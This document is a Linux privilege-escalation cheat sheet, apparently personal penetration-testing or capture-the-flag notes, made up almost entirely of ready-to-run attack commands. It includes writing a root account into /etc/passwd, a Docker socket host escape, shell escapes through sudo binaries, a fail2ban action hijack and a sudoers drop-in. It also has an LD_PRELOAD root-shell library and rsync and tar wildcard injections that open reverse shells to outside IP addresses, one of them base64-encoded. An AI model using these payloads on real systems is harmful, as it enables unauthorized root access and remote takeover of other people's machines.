PE Scripts

Other useful scripts

Capabilities

> getcap -r / 2>/dev/null

Create account by writing to /etc/passwd

# `hacker:pass123`
> echo 'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash' >> /etc/passwd

cron & background processes

  • cron jobs
> cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
> ls -al /etc/cron* /etc/at*
> crontab -l

docker

# check which image is available
> docker images
# PE via the image
> docker -H unix:///var/run/docker.sock run -v /:/host -it {image_name} chroot /host /bin/bash
  • Curl can be used with a Unix socket to talk to the Docker daemon
# https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
> curl --unix-socket /var/run/docker.sock http://localhost/images/json

Escape sequences

# find
> sudo /usr/bin/find . -exec /bin/bash \; -quit

# perl
> perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

# ed
https://www.hackingarticles.in/linux-for-pentester-ed-privilege-escalation/

# mail
> sudo mail --exec='!/bin/bash'

# awk
> awk "BEGIN {system(\"/bin/sh\")}"

fail2ban

# check for fail2ban process
> ps aux | grep fail2ban
# check write permission for actions file
> ls -ls /etc/fail2ban/action.d/iptables-multiport.conf

# modify action for malicious actions
#actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionban = chmod +s /bin/bash

#actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
actionunban = chmod +s /bin/bash
  • fail root ssh login multiple times

files to check

# bash history: .bash_history
# firewall rules: /etc/ufw/user.rules

find

# Find all `SUID` binaries
> find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
> find / -perm -u=s -type f -exec ls -ld {} \; 2>/dev/null
> find / -perm -4000 2>/dev/null
> find / -perm -u=s -type f 2>/dev/null

# Find all files `by owner`
> find / -type f -user yash 2>/dev/null

# Find `writable directories`
> find / -type d -writable -print 2>/dev/null

# Find passwords
> grep -iR 'password' /etc/zabbix/ 2>/dev/null

# Find all modified files since time, popular folder to look for
> find /usr/ -type f -newermt '2022-01-01' -ls 2>/dev/null
> find /usr/ -type f -newermt '2022-02-01' -not -path "/usr/lib/*" -ls 2>/dev/null

grep

> grep -rlw '<pattern>' /

Internal ports

> netstat -ano

Kernel exploits

  • Extract all vulnerable kernels
> curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '

Link hijacking

> ln -fns <evil> <dst>

proc

  • Can be used to enumerate process cmd, environment, stat
/proc/self/environ
/proc/self/stat
/proc/cmdline
/proc/<id>/cmdline

pkexec

  • Check if pkexec has +s
  • Check if user is in admin group
> cat /etc/polkit-1/localauthority.conf.d/*
> pkexec "/bin/sh"
# session 1
> echo $$ #Step1: Get current PID
> pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session

# session 2
> pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec

rsync

> rsync --ignore-existing -t *.* user@<ip>:/backups
> echo 'bash -i >& /dev/tcp/<ip>/5555 0>&1' | base64
> echo 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yMi81NTU1IDA+JjEK|base64 -d|bash' > e.sh
> touch -- '-e sh e.sh'
> chmod +x e.sh
> chmod +x -- '-e sh e.sh'

socat

  • If a file runs a socat in root, can PE through socat
> echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/synapse_commander.s

sudo

  • Check commands you can execute with sudo
> sudo -l

# e.g: using `service` command to achieve PE
> sudo -u {priv-user} /usr/sbin/service ../../../bin/bash

sudoer

  • create a sudoer file and copy to sudoers.d
> echo "<user>  ALL=(ALL:ALL) NOPASSWD:ALL" > <user>
> cp <file> /etc/sudoers.d/
> sudo su -

sudoedit

SUID/SGID

> chmod u+s /bin/bash

# add `+s` from web
> `chmod+u%2bs+/bin/bash`

# e.g -rwsr-xr-x 1 root   root    35K Jan 18  2018 /usr/bin/env
# -p: Turned on whenever the real and effective user ids do not match.
> env bash -p
> bash -p

sudo LD_PRELOAD

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/usr/bin/bash");
}

// compile: gcc -fPIC -shared -o shell.so shell.c -nostartfiles
// load: sudo LD_PRELOAD=shell.so

tar file wild card injeciton

echo "mkfifo /tmp/lhennp; nc 10.4.36.159 5555 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1